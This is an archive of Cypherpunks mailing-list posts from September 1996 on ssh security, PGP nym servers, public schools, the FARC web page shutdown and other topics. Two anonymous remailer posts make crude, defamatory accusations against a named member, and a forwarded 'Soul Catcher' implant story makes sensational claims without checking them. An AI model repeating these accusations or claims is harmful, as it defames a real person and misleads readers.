10.http://www.well.com/~declan/mirrors/
11.http://www.connix.com/~harry/radikal/index.htm
12.http://www.ganesa.com/radikal/
13.http://www.denhaag.org/~radikal
14.http://www.knooppunt.be/~daniel/radikal
15.http://emma.unm.edu/radikal
16.http://www.tacacs.com/radikal/"
17.http://www.dsvenlo.nl/~vvd/radikal/
18.http://www.why.net/home/static/radi
19.http://users.abcs.com/dockmstr/mirror/radikal/index.htm
20.http://home.ipr.nl/~radikal/
21.http://www.dreamy.demon.co.uk/occam/
22.http://www.ibmpcug.co.uk/~irdial/live_free/
23.http://zero.tolerance.org/radi/index.htm
24.http://www.meaning.com/library/radikal/
25.http://www.walli.uwasa.fi/~tviemero/radikal
26.http://www.sko.it/~sfede/radi/index.htm
27.http://www.bart.nl/~sz/index.html
28.http://bellp.med.yale.edu/index.htm
29.http://www.euronet.nl/users/funest/radi/index.htm
30.http://fine.com/~rsr/radikal
31.http://www.lab.net/radikal
32.http://www.charm.net/~gbarren/radikal
33.http://login.datashopper.dk/~pethern/radikal/
34.http://www.interlaw.com
35.http://hyperreal.com/~rich/radikal/index.html
36.http://www.citinv.it/iniziative/info/radikal/
37.http://radikal.autono.net./rad
38.http://www.digiforest.com/~richards/radikal/
39.http://brazil.nbn.com/radikal/
40.http://pitel-lnx.ibk.fnt.hvu.nl/~madcat
41.http://www.hongo.ecc.u-tokyo.ac.jp/~ss56012/radikal/
42.http://web.inter.nl.net/users/E.P.van.der.Vlis/radikal/
43.http://www.threeweb.ad.jp/~fubuki71/mirror/radikal/
44.http://mars.let.uva.nl/~bram/radikal/
45.http://www.design.nl/~bram/radikal/
46.http://www.eskimo.com/~quawk/radikal/
47.http://www.luc.ac.be/~2sbs0 a passtrue page to xs4all and the radikal pages.
48.http://www.calyx.com/~refuse/radikal/
49.http://www.altair.it/xxv
50.http://www.c2.net/radikal
51.http://www.grfn.org/~rtwo
52.http://www.grfn.org:4380 xs4all port mirror
53.http://www.cyberpass.net/radikal
54.http://www.xs4all.nl/~jeroenw/radikal/
55.http://catalog.com/jamesd/radikal/
56.http://www.islandnet.com/~hendrik/RADIKAL.html

From adam at homeport.org Fri Sep 27 07:00:39 1996
From: adam at homeport.org (Adam Shostack)
Date: Fri, 27 Sep 1996 22:00:39 +0800
Subject: ssh - How widely used?
In-Reply-To: <199609270608.CAA24129@rat.eng.lycos.com>
Message-ID: <199609271217.HAA07612@homeport.org>

I have not found security holes in ssh-1.2.14, which is the version I've looked at most in depth. However, I have found things that are disquieting, and as such assume that clever professionals with time available might be able to exploit something. 'Standard' hackers with toolkits are likely to move to the next site.

Adam

Chad Dougherty wrote:
| Adam Shostack writes:
| > There's a windows version, mac is under vague development.
SSH
| > is pretty cool, but the code base is somewhat messy, and it shows
| > signs of its origins in things like systems calls not having their
| > return values checked.
| >
| > Despite all this, I use it, like it, and recommend it for use
| > in systems not likely to come under attack by professionals.
| >
| > Adam
| >
|
| Why do you say "not likely to come under attack by professionals"?
| Have you found security holes in it?
|
| -Chad

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From chris at cybernet.co.nz Fri Sep 27 07:46:59 1996
From: chris at cybernet.co.nz (Chris Wedgwood)
Date: Fri, 27 Sep 1996 22:46:59 +0800
Subject: ssh - How widely used?
Message-ID: <199609271206.AAA02796@cybernet.co.nz>

:From: martin hamilton
:To: cypherpunks at toad.com
:cc: ssh at clinet.fi
:Subject: Re: ssh - How widely used?
:
:On Thu, 26 Sep 1996, Adam Shostack wrote:
:
:> There's a windows version, mac is under vague development. SSH
:> is pretty cool, but the code base is somewhat messy, and it shows
:> signs of its origins in things like systems calls not having their
:> return values checked.
:
:Shame it costs $$$, though I appreciate that Tatu needs to eat... ;-)
:
:Perhaps Cedomir Igaly could be persuaded to release the source code to the
:Windows port he did ? Anyone else interested in getting a little group
:together to hack on this ? (under GPL or BSD style copyright)
:
:Martin

I have a hackery botch job that I have done to make ssh run in a Windows NT console session (untested under '95, but should work). The trouble is it contains a mix of commercial code (which I do not own and cannot distribute) and GNU code. Thus, I can use it myself - but not distribute it.

I was speaking to someone yesterday about this, as I was at one stage thinking I may get the code cleaned up as much as possible (i.e. only contain GNU code) and release it to the masses to play with. Eventually it might turn out to be something of use...
Doing this would, perhaps, undermine Datafellows and Tatu somewhat. As someone who writes code to put food on the table, I wouldn't really feel comfortable doing this. Tatu has spent a whole heap of time on this, doing so wouldn't be fair this early. A freely available, albeit with no guarantee or support and fewer features version of ssh would surely affect sales to a reasonable extent?

I would recommend people buy the product. If you feel it too expensive, then complain to datafellows about this. Eventually they may take some notice of these complaints, or have alternate pricing structures that make the product more attractive for your needs. IMO it's not terribly expensive.

Chris

P.S. (Any replies to this please cc to me or ssh at clinet.fi as I don't read CP very often)

From ronsimpson at unidial.com Fri Sep 27 09:34:09 1996
From: ronsimpson at unidial.com (ronsimpson)
Date: Sat, 28 Sep 1996 00:34:09 +0800
Subject: Public Schools
Message-ID: <324BD4FD.3372@unidial.com>

I hate to burst any bubbles but, the school with the highest number of National Merit Finalists and highest number of 1600 SATs is a Public High School (Jefferson High in Fairfax, VA)

From dustman at athensnet.com Fri Sep 27 10:11:58 1996
From: dustman at athensnet.com (Dustbin Freedom Remailer)
Date: Sat, 28 Sep 1996 01:11:58 +0800
Subject: The daily reminder regarding Timothy C. May, the licenced fellatiologist
Message-ID: <199609271340.JAA02217@godzilla.athensnet.com>

Embedded in Timothy C. May's babblings are preposterous lies, wild distortions, child pornography (both as graphic descriptions and in JPEG format), ethnic slurs, and bomb-making recipes. No wonder he encrypts them.

From perry at piermont.com Fri Sep 27 10:22:34 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 28 Sep 1996 01:22:34 +0800
Subject: ssh - How widely used?
In-Reply-To: <199609270039.TAA05797@homeport.org>
Message-ID: <199609271433.KAA08550@jekyll.piermont.com>

Adam Shostack writes:
> There's a windows version, mac is under vague development. SSH
> is pretty cool, but the code base is somewhat messy, and it shows
> signs of its origins in things like systems calls not having their
> return values checked.
>
> Despite all this, I use it, like it, and recommend it for use
> in systems not likely to come under attack by professionals.

I actually think it's probably okay even for systems that might come under professional attack -- I don't recommend it for use on systems that are mission critical, though, like systems running transactions and such. Indeed, I don't recommend running ANYTHING on such systems unless you are really, really, really careful about what you are running and where you are running it from.

.pm

From adam at homeport.org Fri Sep 27 10:23:20 1996
From: adam at homeport.org (Adam Shostack)
Date: Sat, 28 Sep 1996 01:23:20 +0800
Subject: LivePGP (fwd)
Message-ID: <199609271533.KAA08175@homeport.org>

----- Edited message from Ming-Ching Tiew -----

>From mctiew at csi.po.my Thu Sep 26 22:36:39 1996
Message-ID: <01BBAC57.C7351E60 at minuet>
From: Ming-Ching Tiew
To: "'Adam Shostack'"
Subject: RE: LivePGP
Date: Fri, 27 Sep 1996 09:39:21 +-800
Encoding: 38 TEXT

Do you already have this information ?

http://www.vv.com.au/vv/resources/security/livepgp/README.html

The copy is expiring soon. I will soon be releasing a new copy which is much more polished. I am not releasing the source.

----- End of forwarded message from Ming-Ching Tiew -----

From jya at pipeline.com Fri Sep 27 10:24:07 1996
From: jya at pipeline.com (John Young)
Date: Sat, 28 Sep 1996 01:24:07 +0800
Subject: HBO_ped Phill's AP Op-Ed
Message-ID: <199609271432.OAA17432@pipe1.ny3.usa.pipeline.com>

9-27-96. NYP:

"Unnoticed but Deadly, the I.R.A.'s Secret 'Sleeper' "

Members of a counterterrorism force stormed the building where Mr.
O'Neill lived, threw tear-gas canisters into his second-floor back apartment and shot him six times as he stood in the doorway. The police said Mr. O'Neill made a threatening gesture at them, but he was later found to have been unarmed. An intelligence officer said, "The sleeper is totally committed, aware of all the surveillance techniques and our ability to penetrate the organization. He knows when to keep his mouth shut. He stays as anonymous as possible."

"South African Links Top Spy To the Slaying Of Olof Palme"

The commander of a police hit squad testified today that the assassination, by a lone gunman who shot Mr. Palme in the back of the head, had been the work of Operation Long Reach, a secret apartheid-era program intended to harass, silence and gather information about opponents of South Africa's white-led Government abroad. "It was one of Craig Williamson's Operation Long Reach projects," he said. Officially, Mr. Williamson left the police department in 1985, ostensibly to go into business with an Italian millionaire operating from the Seychelles. In reality, he then started Long Reach, a company that did some legitimate international security work, but which was largely created to give him the cover to do whatever he pleased around the world.

-----

http://jya.hboped.txt

HBO_ped

From rah at shipwright.com Fri Sep 27 10:35:12 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 28 Sep 1996 01:35:12 +0800
Subject: Public Schools
Message-ID:

I forwarded this to someone, who said:

--- begin forwarded text

From: somebody
Date: Fri, 27 Sep 1996 00:26:28 -0400
To: rah at shipwright.com
Subject: Re: Public Schools

Bob,

I'm not sure I want to get my name on this particular set of info, but the story on IQ and SAT scores is, to a certain extent, spelled out in "The Bell Curve." The simple, short version is for IQ where the distribution is nearly normal with a mean of 100 and a standard deviation of 15.
(Recall that, in a normal distribution, two standard deviations above the mean (2-sigma) is achieved by only 1-2%, and 3-sigma, by a factor of 10 fewer.)

There used to be a simple (public) answer for the SAT: mean of 500 and standard deviation of 100. So 500 = 100 and 800 = 145? Well, maybe.

The answer for SAT (verbal) scores (1961 data only, sorry) is neither short nor simple. The distribution is decidedly non-normal. The peak is at 280-ish, and the high side looks kind of like a normal distribution. If it were, the standard deviation would be 170 or so. Because of this, the average is 475-ish. Oh, well.

Thus, maybe, an SAT of 800 = an IQ of 145. But 475 = 100? Or is it 280 = 100? And of course, the populations aren't even close to the same. Only those who might go to college take the SAT. And in 1961 that was even more so.

Maybe that's why they call them social scientists.

--- end forwarded text

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From rah at shipwright.com Fri Sep 27 10:45:46 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 28 Sep 1996 01:45:46 +0800
Subject: Newsgroup proposal: misc.anonymous
In-Reply-To:
Message-ID:

At 7:47 pm -0400 9/26/96, Mark M. wrote:
> It is still active. However, there are many people who do not receive the
> alt.* groups and those who do may only receive newsgroups "approved" by
> the news admin. It is much more difficult to restrict distribution of
> newsgroups carried by most major news feeds. Also, some NNTP servers may
> expire alt groups faster than the other hierarchies which is very undesirable
> for message pools.
It seems that if newsgroup RFC and the whole rigamarole of newsgroup voting was set up, there would be enough people -- on this list alone, probably -- who would be interested enough in the idea to at least vote (publicly) for it. I certainly would, just to see what happens.

Of course, that means that someone *else* ;-) has to actually put the train on the track, much less lay the rails, which, as usual, is the main problem here. If we had some ham, we could have some ham and eggs, if we had some eggs. If you lived here, you'd be home now. And so forth. Same as it ever was.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From rah at shipwright.com Fri Sep 27 11:03:07 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 28 Sep 1996 02:03:07 +0800
Subject: In defense, sort of, of Phill Hallam-Baker
In-Reply-To: <199609270005.TAA00319@smoke.suba.com>
Message-ID:

At 10:24 pm -0400 9/26/96, Timothy C. May wrote:
> Any, I had several e-mail exchanges (in private) with Phill on this
> subject, and I hardly think he's a "thoroughly lousy human being."

Let me first say that I have my Mac Eudora filters set so that if any message contains Phill's e-mail address and cypherpunks it goes straight to the trash. Sorry, Phill, but most of what you say here only raises my blood pressure, so I'd rather not read it, or any of the justifiable but predictable responses people have here to it.

Having said that, I do not bozo-filter Phill anywhere else on the net. The reason is, he makes valuable contributions to lists like micropay (which he started), or dcsb (which he is a founding member of), or any other non-political discussion he's in. With the exception of politics, in my opinion, he is *not* clueless.
More to the point, Phill even shows up at DCSB meetings, and I think he's a nice guy, and I like to think that I can call him a friend.

However, I also think that Phill has this passion for order that sometimes borders on the pathological. Maybe because, like Bertrand Russell (who Phill and I both admire) says, romanticism, leftism and communism are basically feudalism in disguise, and Phill's a closet aristocrat. ;-). Maybe not.

I think what we see as his blustering trolls on this list come from passion. But, I don't think they're trolls at all. I think they show, more often than not, his outrage at the way the world's going to go. Which, obviously, is *our* way, and not his. He knows very well the power of the technology we talk about here, and deep down, I think he knows we're right.

Phill, and Dorothy Denning, and David Sternlight, and other smart, nice (I haven't met Sternlight), and otherwise clueful people like them, are all living in a state of heavy denial right now, and they're very articulate about it. :-). I figure the best way to give them room is to just filter them out in places where they disturb me, and get on with the business of proving them wrong. They'll wake up. Everybody will, sooner or later.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From corbet at stout.atd.ucar.edu Fri Sep 27 11:04:13 1996
From: corbet at stout.atd.ucar.edu (Jonathan Corbet)
Date: Sat, 28 Sep 1996 02:04:13 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID: <199609271501.JAA14868@atd.atd.ucar.EDU>

> Does anyone know if there are MS-Dos or Mac versions of the ssh client?
> How much is ssh used?

Ssh is good stuff -- we use it here. Things I like:

- It's an easy, drop-in replacement for the r* commands. It's easy to get people to use it.
- It creates that much more encrypted traffic on the net. That can only be a good thing, eh?
- There are a few different authentication modes, which makes life easy. Host keys can be used for fixed machines; per-user keys can sit on the laptop and work no matter whose network you've plugged into today.

When my local ISP found a password sniffer running on his machine and went into red alert, I just smiled and didn't bother to change my passwords on hosts I had logged into via the ISP's net. Good stuff.

jon

Jonathan Corbet
National Center for Atmospheric Research, Atmospheric Technology Division
corbet at stout.atd.ucar.edu http://www.atd.ucar.edu/rdp/jmc.html

From declan at well.com Fri Sep 27 11:09:00 1996
From: declan at well.com (Declan McCullagh)
Date: Sat, 28 Sep 1996 02:09:00 +0800
Subject: Columbian guerrillas get kicked off of the Net
Message-ID:

---------- Forwarded message ----------
Date: Fri, 27 Sep 1996 07:25:03 -0700 (PDT)
From: Declan McCullagh
To: fight-censorship at vorlon.mit.edu
Subject: Columbian guerrillas get kicked off of the Net

[Perhaps it's time to mirror the Columbian guerrillas' home page? Volunteers, anyone? (I wonder what the British, had the Internet existed in 1776, would have done to muzzle the colonial rebels' web sites -- which would have called for a violent overthrow of the government. Perhaps the founding fathers' home pages would have been copied and mirrored in France?) --Declan]

*********

Colombia censors guerilla home page

By Reuters
September 26, 1996, 4:15 p.m. PT

A Colombian guerrilla group currently involved in a bloody offensive in the mountains and jungles, suffered a setback in its propaganda battle when its new voice on the Internet was mysteriously silenced.

The Revolutionary Armed Forces of Colombia (FARC), which has periodically paralyzed half the country with road blocks, found its route to the information superhighway barred.
The Communist insurgents, who rose up in arms in 1964, embraced new technology last year in their fight to overthrow the government by launching a home page on the Internet.

"Using weapons naturally comes within the logic of the armed struggle. Just fighting through the Internet would be like shooting rubber bullets. Not using it would be like continuing to fight the army with a 12-bore shotgun," said Marco León Calarcá, the FARC's Mexico City-based international spokesman.

But in unexplained circumstances, which a spokeswoman for the Mexico City-based Internet provider Teesnet said may or may not be linked to external pressures, the plug was pulled on the service Monday--a day after being publicized in Colombia's leading daily, El Tiempo.

Calarcá admitted the loss of the Internet page was a serious reversal but vowed the computer-age conflict was far from over.

[...]

The Colombian guerrillas used their Web site to publish their political magazine Resistencia, whose distribution is banned in Colombia, and to offer explanations about their latest armed actions.

FARC, labeled narcoguerrillas since the 1980s when U.S. ambassador Lewis Tambs highlighted the group's alleged connections with Colombia's drugs trade, have been dubbed cyberspace guerrillas since their appearance on the Internet.

"Cyberspace guerrillas may seem a fun name but I think it is pejorative and belittles what we're doing," said León Calarcá. "We are looking to topple the government and set up a new Colombia.

In the four weeks since the FARC unleashed its latest offensive with an attack on a jungle base in southern Putumayo province, more than 150 soldiers, police, and civilians have died.

###

From geeman at best.com Fri Sep 27 11:43:58 1996
From: geeman at best.com (geeman)
Date: Sat, 28 Sep 1996 02:43:58 +0800
Subject: [Fwd: Email Robot draws fire from CypherPunkz]
Message-ID: <324BF794.801@somewhere.gov>

An embedded message was scrubbed...
From: unknown sender
Subject: no subject
Date: no date
Size: 11099
URL:

From perry at piermont.com Fri Sep 27 12:17:35 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 28 Sep 1996 03:17:35 +0800
Subject: ssh - How widely used?
In-Reply-To: <199609270608.CAA24129@rat.eng.lycos.com>
Message-ID: <199609271552.LAA08679@jekyll.piermont.com>

Chad Dougherty writes:
> > Despite all this, I use it, like it, and recommend it for use
> > in systems not likely to come under attack by professionals.
>
> Why do you say "not likely to come under attack by professionals"?
> Have you found security holes in it?

Security professionals do not recommend use of systems they feel less than perfectly comfortable with whether or not they know of specific holes.

Perry

PS sorry for posting something about a cryptographic security system in the midst of all the normal talk -- I know it's off topic.

From shamrock at netcom.com Fri Sep 27 12:48:04 1996
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 28 Sep 1996 03:48:04 +0800
Subject: "Soul Catcher" Computer Chip (fwd)
Message-ID:

What's next? Thought escrow?

--Lucky

---- Forwarded Message from other list ------

Figured you might be interested in this. I copied it from Nexus Oct/Nov 1996.

QUOTE

SOUL CATCHER IMPLANTS

British scientists are developing a concept for a computer chip which, when implanted into the skull behind the eye, will be able to record a person's every life time thought and sensation.

"This is the end of death," said Dr. Chris Winter of British Telecom's artificial-life team. He predicts that within thirty years it will be possible to relive other people's lives by playing back their experiences on a computer. "By combining this information with a record of a person's genes, we could recreate a person physically, emotionally and spiritually."

Dr Winter and his team of scientists at BT's Martlesham Heath Laboratories, near Ipswich, call the chip "the Soul Catcher."
British Telecom would not divulge how much money it is investing in the project, but Dr. Winter said it was taking "Soul Catcher 2025" very seriously. He confessed there were profound ethical considerations, but emphasised that BT was embarking on this line of research so it could keep at the forefront of communications technology.

Dr. Winter said "an implanted chip would be like an aircraft's black box, and would enhance communications beyond current concepts. "For example, police would be able to use it to relive an attack, rape or murder from the victim's viewpoint, to help catch the criminal... I could even play back the smells, sounds and sighs of my holidays to friends.

Other more frightening applications include downloading an older person's experiences into a newborn baby by transplanting the chip.

Sources: The Daily Telegraph, the Daily Mail, 18 July 1996

UNQUOTE

From tcmay at got.net Fri Sep 27 12:48:48 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 28 Sep 1996 03:48:48 +0800
Subject: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID:

At 9:22 AM -0400 9/27/96, ronsimpson wrote:
>I hate to burst any bubbles but, the school with the highest number of
>National Merit Finalists and highest number of 1600 SATs is a Public
>High School (Jefferson High in Fairfax, VA)

I took some of my science classes at Jefferson.

Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS. Help me before it's too late.

(Seriously, my view is that schools are not very important. All success, academic or technical, derives from one basic determining factor: those who read for pleasure, succeed, and those who don't read for pleasure, don't. The young child who reads will usually keep reading, whether novels, encyclopedias, lists like this, etc. The child who is not into reading will likely never get into it later in life. Which is OK, as there is a serious shortage of tradesmen, at least in my area, and more kids ought to be taught usable trades.
Seriously. Our "ideal" that all children should attend college is absurd, given the lack of academic preparation, desire, and reading skills that so many high school students lack. Most community colleges are essentially becoming Grades 13-14, with most of the Grade 13-14 students reading at the 9th-grade level (which most of us on this list were reading at when we were in the 7th-grade, or earlier).)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From ericm at lne.com Fri Sep 27 13:12:11 1996
From: ericm at lne.com (Eric Murray)
Date: Sat, 28 Sep 1996 04:12:11 +0800
Subject: ssh - How widely used?
In-Reply-To: <199609271501.JAA14868@atd.atd.ucar.EDU>
Message-ID: <199609271621.JAA25705@slack.lne.com>

Jonathan Corbet writes:

[stuff about SSH deleted]

> When my local ISP found a password sniffer running on his machine and went
> into red alert, I just smiled and didn't bother to change my passwords on
> hosts I had logged into via the ISP's net.

You probably should. There's more places to 'sniff' information than just from the network.

An example is the Streams-based tty snooper. It pushes a Streams module between the tty and the shell. No encryption program can protect that, as it has to be in the clear unless you can do RC4 in your head. :-)

The program I'm thinking of (sorry I forgot the name) lets the operator both read and write to any tty session on the machine.

--
Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm
If you don't see the fnords, they won't eat your packets.
If you do see the fnords, they will eat your packets, so you won't see them.
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF

From isptv at access.digex.net Fri Sep 27 13:20:28 1996
From: isptv at access.digex.net (ISP-TV Main Contact)
Date: Sat, 28 Sep 1996 04:20:28 +0800
Subject: David Sobel interview on ISP-TV Monday Night Sept. 30
Message-ID: <199609271631.MAA02841@access5.digex.net>

*** ISP-TV Program Announcement: David Sobel Interview ***
Monday, Sept. 30
9:00 PM ET

David Sobel is a legal counsel to the Electronic Privacy Information Center, and an outspoken crusader for Internet free speech, cryptographic rights, and on-line privacy. He has litigated dozens of Freedom of Information Act (FOIA) cases involving subjects such as the Digital Signature Standard, the Clipper Chip, the FBI's Digital Telephony proposal and the 2600/Pentagon City Raid. He has also written for WIRED magazine, and "The Net" online magazine.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV Network

To obtain CU-SeeMe software, see URL http://www.wpine.com/cudownload.htm

From tcmay at got.net Fri Sep 27 13:47:14 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 28 Sep 1996 04:47:14 +0800
Subject: VCRS and Crypto
In-Reply-To: <199609270322.UAA14111@mail.pacifier.com>
Message-ID:

At 8:22 PM -0800 9/26/96, jim bell wrote:

>Remember the VHS/Beta VCR wars? With a fairly equal market in about 1978,
>Beta died 10 years later because the market couldn't support two
>incompatible standards. It wasn't that one was dramatically better than the
>other, it was simply that having two standards forced the market to
>duplicate stocks, for the machines as well as tapes, particularly
>pre-recorded tapes. Notice, however, that VCR's are relatively "isolated":
>It doesn't really matter if you have one format and your neighbor has
>another, unless you want to swap tapes. But crypto telephones inherently
>require (in the long term) full intercompatibility. If you didn't have that,
>there'd be half a world of people you couldn't call!

Be careful when drawing conclusions from the "VCR Wars." (BTW, James Lardner has a book out on this subject.) There are various interpretations of what happened. While I, for example, had both formats, I ultimately shelved my Beta unit.

Some views often heard:

* The longer recording time of VHS was more compelling to most consumers than the higher quality of Beta. Not surprising in the late 70s, early 80s, when most consumers had televisions incapable of showing the difference in quality. (Even today, most consumers are happy to rent VHS tapes which are rather "dodgy" in quality.)

* VHS was "Pretty Good Video," and PGV was enough for its time.

* Once VHS took a lead over Beta, the snowball effect took hold. Video rental stores started to appear in earnest in around 1980, and by then VHS had enough of a lead over Beta to cause the stores to stock VHS tapes for rental over Beta tapes. This dramatically widened the lead of VHS over Beta.

(Jim's point: "Notice, however, that VCR's are relatively "isolated": It doesn't really matter if you have one format and your neighbor has another, unless you want to swap tapes." But in fact a large fraction of all VHS owners use their machines to _rent_ tapes, so the compatibility with what the many rental stores carry is paramount.)

A tenuous link to crypto is that various VCR formats can still intercommunicate because they all use NTSC (or PAL, SECAM in some countries) as the "common language." This is analogous to the way various flavors of PGP on various platforms can communicate with other flavors because ASCII text is read and written by all.
As I have argued many times, this was really the Big Win for PGP, that it did not use an odd or proprietary format that was platform-specific. Such basic ASCII operation ensures interoperability, and is of course inconsistent with the government talk of making sure that key-escrow products cannot interoperate with non-key-escrow or "alternately"-escrowed products.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From mixmaster at remail.obscura.com Fri Sep 27 13:50:12 1996
From: mixmaster at remail.obscura.com (Mixmaster)
Date: Sat, 28 Sep 1996 04:50:12 +0800
Subject: Jena Remailer
Message-ID: <199609271630.JAA24185@sirius.infonex.com>

wmono at Direct.CA wrote:

w> On Sun, 22 Sep 1996, Mixmaster wrote:

>> Can any native English speaker please paraphrase the account
>> start-up procedure for us?

w> I took a stab at re-writing the help file, and I've attached it below.
w> The operator of jena might want to use it instead of the help file
w> currently being distributed, after correcting any errors and adding
w> the German sections back in.

OK, it's an improvement, but there's still some obscurity and a couple of other problems:

w> I believe these instructions are correct -- I was able to follow them
w> to create a nym, and use it. YMMV.

So far I have had no luck, but this may be due to a mail lag, I dunno...

w> * The hexadecimal key-ID forms the Email address.
For example, if the nym's key is 0x01020304, the address will be:
anon-01020304 at as-node.jena.thur.de

Already a confusion: Is not the address pseudonym at as-node.jena.thur.de? And, since the key ID is an eight-digit hex number, why the confusing

"...if the nym's key is 0x01020304, the address will be:"
                        ^^
...or am I missing something already?

w> * The user-ID of the key contains the pseudonym, only.
Note: This is different from the convention, which is to include the Email address in angle brackets.

OK, so if I understand this properly, when prompted for an account name in PGP one simply enters

pseudonym

...with no quotes or address ("pseudonym" ).

w> If the signature is valid, the decrypted body should be a header for
w> the outbound mail, followed by a blank line, then the body for the
w> outbound mail. The following are headers considered valid by the
w> server:
w> * Subject: (or Anon-Subject:)
w> * To: (or Anon-To:)
w> * Newsgroups: (or Post-To: or Anon-Post-To:)

The header fields in parens are identical in function or not?

w> - Run 'pgp -esa -u "pseudonym" anon at as-node anonid.asc' to sign and
w> encrypt the extracted key for the server.

These various command lines in the helpfile do not work in the pre-legal PGP 2.6/uix/ui versions preferred by many, though equivalent command lines of course exist.

w> - Test your nym by posting to a test group (de.test is recommended due to the location of the server) and wait several days before requesting mail delivery.

Well, the sent message didn't show up in the newsgroup here, but there are often lengthy delays anyway...

w> - If it didn't work, repeat the entire procedure. It's possible that the key-ID already exists in the server's database and belongs to another pseudonym.

The procedure didn't produce results for me so far, but before trying again I wish to get confirmation that I am trying properly:

(Shortform directions)

1: Generate key with simple, one-word pseudonym, no quotes, no address, no nothing.
2: Generate -kxa keyfile, pseudo.asc

3: -esa encrypt keyfile with Jenaer Remailer's PGP key and send to anon at as-node.jena.thur.de via a remailer.

4: Account is automatically established and should work immediately.

To test...

1: Prepare message textfile according to sample:

Newsgroups: de.test
Subject: Test

This is the test message textbody...

[or, alternately...]

To: de.test at news.demon.co.uk
Subject: Test

This is the test message textbody...

2: PGP encrypt the filebody and two header lines with the Jenaer Remailer's key using the -esa command, signing the cyphertext with your key previously sent to the remailer.

3: Send the resulting cyphertext message to the Jenaer Remailer via another remailer, making sure to avoid command words in the Subject: field of the outgoing message.

As I say, following these protocols I have not yet seen a resulting message in the test group I have chosen. Do you feel this is due to lag, or am I doing something obviously wrong?

w> 2E.request Email to be delivered?
[...]
w> - Never request a delivery to your real Email address.

So here's what I really want to know: When/if the new account is up and running, how _does_ one discreetly retrieve his mail? I don't see how, other than to have it sent to alt.anonymous.messages via a mail2news netmail address such as alt.anonymous.messages at news.demon.co.uk and then pick through the mess there until some cyphertext message responds to his right key. Either that or else have it sent to yet another pseudonymous account, with all the uncertainties and delivery vicissitudes that entails.

From adam at homeport.org Fri Sep 27 13:57:42 1996
From: adam at homeport.org (Adam Shostack)
Date: Sat, 28 Sep 1996 04:57:42 +0800
Subject: ssh - How widely used?
In-Reply-To: <199609271552.LAA08679@jekyll.piermont.com>
Message-ID: <199609271823.NAA08790@homeport.org>

Actually, I recommend systems based on threat and comfort.
If the system is protected (ie, behind a firewall, on a compartmentalized network), I use ssh, no problem. I use ssh even where I'm not comfortable with it because I'm more comfortable with it than with the alternatives, but there are times when the "No remote access" option is more comfortable than ssh.

Adam

Perry E. Metzger wrote:
| Chad Dougherty writes:
| > > Despite all this, I use it, like it, and recommend it for use
| > > in systems not likely to come under attack by professionals.
| >
| > Why do you say "not likely to come under attack by professionals"?
| > Have you found security holes in it?
|
| Security professionals do not recommend use of systems they feel less
| than perfectly comfortable with whether or not they know of specific
| holes.

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From jbugden at smtplink.alis.ca Fri Sep 27 14:25:00 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Sat, 28 Sep 1996 05:25:00 +0800
Subject: Public Schools
Message-ID: <9608278438.AA843856542@smtplink.alis.ca>

ronsimpson at unidial.com wrote:
>I hate to burst any bubbles but, the school with the highest number
> of National Merit Finalists and highest number of 1600 SATs is a
> Public High School (Jefferson High in Fairfax, VA)

The same is true for Montreal (Royal Vale) using the equivalent scoring methods. But there are public schools at both extremes of the curve.

While it is true that Private Schools would not survive due to market forces if they did consistently poorly, it is also true that they filter their incoming student body in a manner that Public Schools can not.

If you want to refuse those who are too stupid or anti-social from Public Schools in order to improve the social or intellectual climate, you better have a solution for the resulting cast-offs.
James

From nobody at huge.cajones.com Fri Sep 27 14:36:10 1996
From: nobody at huge.cajones.com (Huge Cajones Remailer)
Date: Sat, 28 Sep 1996 05:36:10 +0800
Subject: The periodic word of advice about Timothy May, the licenced fellatiologist
Message-ID: <199609271806.LAA07079@fat.doobie.com>

There's a rumor that Timothy May sells his dead relatives as fertiliser as they constitute the best shit in California.

